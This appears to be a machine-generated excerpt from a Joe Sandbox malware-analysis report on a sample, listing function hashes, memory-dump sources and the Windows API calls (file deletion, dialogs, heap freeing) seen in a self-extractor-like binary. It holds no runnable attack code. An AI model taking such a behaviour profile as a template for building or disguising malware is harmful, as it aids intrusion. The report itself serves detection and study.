                        • String ID:
                        • API String ID:
                        • Opcode ID: db7cb35a49ac0746d3c7e692e9b68577669955e11015c63b0de509be97ddef76
                        • Instruction ID: c481d985d9a4dd5b72e973bf051457b14341fd8719c9934a057249447c19e128
                        • Opcode Fuzzy Hash: db7cb35a49ac0746d3c7e692e9b68577669955e11015c63b0de509be97ddef76
                        • Instruction Fuzzy Hash: D65259B26087019FC758CF19C891A6AF7E1FFC8304F89892DF99687255D734E919CB82
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction ID: 016ca3e89da11001fa2b0f2d0ccd5586ed4fb97865f85ebeb38abba59f8f9b10
                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction Fuzzy Hash: C5C171362091A309EB2D567A943443FBFE15AA27B531A076DE4B3CF1C4FE20D624D724
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction ID: 520b2631d209f69468757ae4fd21087463b58538147257e28e3f6a3b820d33e5
                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction Fuzzy Hash: 6DC173322090930AEB2D567AD47453FFFE15AA27B531A076DE4B2CB1D4FE20D624D724
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction ID: fb4c19ca3bd2e77bbb369f18ff291cb895e84de96d7e4b5cc3f8900f399e020d
                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction Fuzzy Hash: B5C174322091930AEF2D567A943453FFFE15AA27B531A076DE4B2CB1D4FE20D624D724
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction ID: 2fc489ef1f5aacde016c746cdea68130c7238835955528091f51b4491e1921e8
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction Fuzzy Hash: 63C1913220919309EF2D567A843443FBFE15AA27B931A17ADE4B2CB1C4FE20D7649764
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77e6401fc2c3d06303e4a31124247a3835b4b27759ef24f269c77f10eea1559a
                        • Instruction ID: 420fa0a2c097fde73a6e9026578c18be5a389ca90a7f36ef56dd948f5ace172a
                        • Opcode Fuzzy Hash: 77e6401fc2c3d06303e4a31124247a3835b4b27759ef24f269c77f10eea1559a
                        • Instruction Fuzzy Hash: 83D16C745183C49FC708CF19E8A0A2ABBF1AB8B318B488A5EF5D5D7352C335E615DB21
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3fa15c894a1d54d655c8354ffd37a08a97fa9d97d75a1e01c0f90924a553c39a
                        • Instruction ID: 083aaa475d15b5230dbc156fdb08c73744dd042c9e2b8275b76476645f102f2b
                        • Opcode Fuzzy Hash: 3fa15c894a1d54d655c8354ffd37a08a97fa9d97d75a1e01c0f90924a553c39a
                        • Instruction Fuzzy Hash: 8F61783160C70966DA387A288899BBE6395DF0130CF34071DE862EB2D1F651DF82E35E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99a4ca98beb43dd7d4c0ed1ba7b4c761d77eb4fca75d4a1c96a678dbb3d8c80d
                        • Instruction ID: 507bfeca3a1216a029d49baf52fbb9a2e29e03cbb194f067398a7c80f3618438
                        • Opcode Fuzzy Hash: 99a4ca98beb43dd7d4c0ed1ba7b4c761d77eb4fca75d4a1c96a678dbb3d8c80d
                        • Instruction Fuzzy Hash: C181A2851192E87EC70A8F3D38A43ED3EE15777349B1D80BAD9C9C72A3C1764698D721
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7412bc839d6944f15cc8075484d7ae75a8fd07efc3fc1e309ca9a3bd4677f05c
                        • Instruction ID: 0254dca1fe534adf1c576338c0c115e60f0290e06a668d8ea1f38a14f9044f85
                        • Opcode Fuzzy Hash: 7412bc839d6944f15cc8075484d7ae75a8fd07efc3fc1e309ca9a3bd4677f05c
                        • Instruction Fuzzy Hash: B451D1305083D54FC716CF29859456EFFE4AFDA318F49889EE4E94B212C230DB4AEB52
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42bdfc3f60dad55180fc3e076fe0f01d85970f628577caba8d2b4c26abbe71e8
                        • Instruction ID: 15516a392827c3b5b3579113c8a506803068eb6caae2c4f50ddb8c40b1338527
                        • Opcode Fuzzy Hash: 42bdfc3f60dad55180fc3e076fe0f01d85970f628577caba8d2b4c26abbe71e8
                        • Instruction Fuzzy Hash: 6E21B631A301A14BCB0DCE2DDC9463E7751E78B30174AC22FEE4ACB691C535EA26D7A0
                        APIs
                        • __EH_prolog.LIBCMT ref: 00C7F910
                          • Part of subcall function 00C7E5B0: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00C7E678
                        • SetFileAttributesW.KERNEL32(?,00000005,?,?,00000000,00000001,00C7F221,?,00000000), ref: 00C7FA45
                        • SHFileOperationW.SHELL32(?), ref: 00C7FAF2
                        • GetFileAttributesW.KERNEL32(?), ref: 00C7FAFF
                        • DeleteFileW.KERNEL32(?), ref: 00C7FB0D
                        • SetWindowTextW.USER32(?,?), ref: 00C7FC56
                        • _wcsrchr.LIBVCRUNTIME ref: 00C7FDE0
                        • GetDlgItem.USER32(?,00000066), ref: 00C7FE1B
                        • SetWindowTextW.USER32(00000000,?), ref: 00C7FE2B
                        • SendMessageW.USER32(00000000,00000143,00000000,00CBA73A), ref: 00C7FE3F
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C7FE68
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemOperationStrings_wcsrchr
                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                        • API String ID: 764735972-312220925
                        • Opcode ID: ca1e0c3c4881ea37585423daec3c62d249bb8e3a3e0befeecbcbac5bcb25b044
                        • Instruction ID: 9a2b0e90db1b57035db8f3b3a77837bec3ceb8da573b2f48d9d4dfa4cafb045e
                        • Opcode Fuzzy Hash: ca1e0c3c4881ea37585423daec3c62d249bb8e3a3e0befeecbcbac5bcb25b044
                        • Instruction Fuzzy Hash: 47E19572900119AAEF25EBA0DD85EEE737CAF04354F1080BAF959E3051EF709B85DB64
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 00C8E3BF
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DF77
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DF89
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DF9B
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFAD
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFBF
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFD1
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFE3
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFF5
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E007
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E019
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E02B
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E03D
                          • Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E04F
                        • _free.LIBCMT ref: 00C8E3B4
                          • Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
                          • Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826
                        • _free.LIBCMT ref: 00C8E3D6
                        • _free.LIBCMT ref: 00C8E3EB
                        • _free.LIBCMT ref: 00C8E3F6
                        • _free.LIBCMT ref: 00C8E418
                        • _free.LIBCMT ref: 00C8E42B
                        • _free.LIBCMT ref: 00C8E439
                        • _free.LIBCMT ref: 00C8E444
                        • _free.LIBCMT ref: 00C8E47C
                        • _free.LIBCMT ref: 00C8E483
                        • _free.LIBCMT ref: 00C8E4A0
                        • _free.LIBCMT ref: 00C8E4B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 7c4c81a1eb352cea7afcd963bef55403107ac01dfcae639e477e8e1882c69864
                        • Instruction ID: c0fc55461a560c4374b707aa3c75d6fb126e9639eeef685b6fc74c72fb19cb58
                        • Opcode Fuzzy Hash: 7c4c81a1eb352cea7afcd963bef55403107ac01dfcae639e477e8e1882c69864
                        • Instruction Fuzzy Hash: 7C318E31600305AFEB30BA78D845B5A73E9EF44318F14442AF469D71A1EF71EE80EB29
                        APIs
                        • GetWindow.USER32(?,00000005), ref: 00C807A3
                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00C807D2
                          • Part of subcall function 00C76FA3: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C72D5B,?,?,?,00C72D0A,?,-00000002,?,00000000,?), ref: 00C76FB9
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C807F0
                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00C80807
                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00C8081A
                          • Part of subcall function 00C7DA58: GetDC.USER32(00000000), ref: 00C7DA64
                          • Part of subcall function 00C7DA58: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7DA73
                          • Part of subcall function 00C7DA58: ReleaseDC.USER32(00000000,00000000), ref: 00C7DA81
                          • Part of subcall function 00C7DA15: GetDC.USER32(00000000), ref: 00C7DA21
                          • Part of subcall function 00C7DA15: GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7DA30
                          • Part of subcall function 00C7DA15: ReleaseDC.USER32(00000000,00000000), ref: 00C7DA3E
                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00C80841
                        • DeleteObject.GDI32(00000000), ref: 00C80848
                        • GetWindow.USER32(00000000,00000002), ref: 00C80851
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                        • String ID: STATIC
                        • API String ID: 1444658586-1882779555
                        • Opcode ID: 77b6e5ff1c71d88815d2b8e29ed35f0c303971d9ab89afda7c7399ca09b17534
                        • Instruction ID: f4661ef7b53258a71744423aa7d8ebf3a8e5c2f1bbaed42c40b93e5a6f5e324e
                        • Opcode Fuzzy Hash: 77b6e5ff1c71d88815d2b8e29ed35f0c303971d9ab89afda7c7399ca09b17534
                        • Instruction Fuzzy Hash: EC21F0725417147BEB217B649C4EFAF376CAF05711F214022FA19E60C2CA649E8697E8
                        APIs
                        • _free.LIBCMT ref: 00C8B042
                          • Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
                          • Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826
                        • _free.LIBCMT ref: 00C8B04E
                        • _free.LIBCMT ref: 00C8B059
                        • _free.LIBCMT ref: 00C8B064
                        • _free.LIBCMT ref: 00C8B06F
                        • _free.LIBCMT ref: 00C8B07A
                        • _free.LIBCMT ref: 00C8B085
                        • _free.LIBCMT ref: 00C8B090
                        • _free.LIBCMT ref: 00C8B09B
                        • _free.LIBCMT ref: 00C8B0A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: feeabcb93c1070f050c4b24f114d0ad9493f9b558a8e61cbd2a4efab3c1e56e2
                        • Instruction ID: ca86af60c7b892f010a409835ab64eaf2e4aca20e6657b0464b3fe47cad4bb37
                        • Opcode Fuzzy Hash: feeabcb93c1070f050c4b24f114d0ad9493f9b558a8e61cbd2a4efab3c1e56e2
                        • Instruction Fuzzy Hash: 6111747A550148AFDB11FF98C842DD93BB5EF08354B5141A6FA088B236EA31DF90FB85
                        APIs
                          • Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
                          • Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA
                        • EndDialog.USER32(?,00000001), ref: 00C7E873
                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7E8A0
                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00C7E8B5
                        • SetWindowTextW.USER32(?,?), ref: 00C7E8C6
                        • GetDlgItem.USER32(?,00000065), ref: 00C7E8CF
                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00C7E8E3
                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00C7E8F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: MessageSend$Item$TextWindow$Dialog
                        • String ID: LICENSEDLG
                        • API String ID: 3214253823-2177901306
                        • Opcode ID: 1ded733474fb68cef1553da994ab9f3abbb4af9fb96391f45b3dbf8ffdac1a59
                        • Instruction ID: b77a6b07d114541e0788cfc37ecc6a7ccf33369f6fbc60e1df91ddb50e12ed5c
                        • Opcode Fuzzy Hash: 1ded733474fb68cef1553da994ab9f3abbb4af9fb96391f45b3dbf8ffdac1a59
                        • Instruction Fuzzy Hash: A221B833204204BBE6116B7AEC49F7F3B6CEB4AB55F05806DF609E21E1CB629D01A635
                        APIs
                        • GetTickCount.KERNEL32 ref: 00C7CCDD
                        • GetTickCount.KERNEL32 ref: 00C7CCFB
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7CD11
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7CD25
                        • TranslateMessage.USER32(?), ref: 00C7CD30
                        • DispatchMessageW.USER32(?), ref: 00C7CD3B
                        • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00C7CDEB
                        • SetWindowTextW.USER32(?,00000000), ref: 00C7CDF5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                        • String ID:
                        • API String ID: 4150546248-0
                        • Opcode ID: 04de50a64e3405bd62768280bdd1f18213dd876b615c561f0efadaf2af2abc25
                        • Instruction ID: 89cbac522a16d4bfd0b7049a0c71499520672dfd40250306d99f3d22a0c3ad67
                        • Opcode Fuzzy Hash: 04de50a64e3405bd62768280bdd1f18213dd876b615c561f0efadaf2af2abc25
                        • Instruction Fuzzy Hash: 55415B71204306AFD710DF65D888E2BBBE8FF98705B10482EFA5AC7160DB71E945CB62
                        APIs
                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00C91B62,?,00000000,?,00000000,00000000), ref: 00C9142F
                        • __fassign.LIBCMT ref: 00C914AA
                        • __fassign.LIBCMT ref: 00C914C5
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C914EB
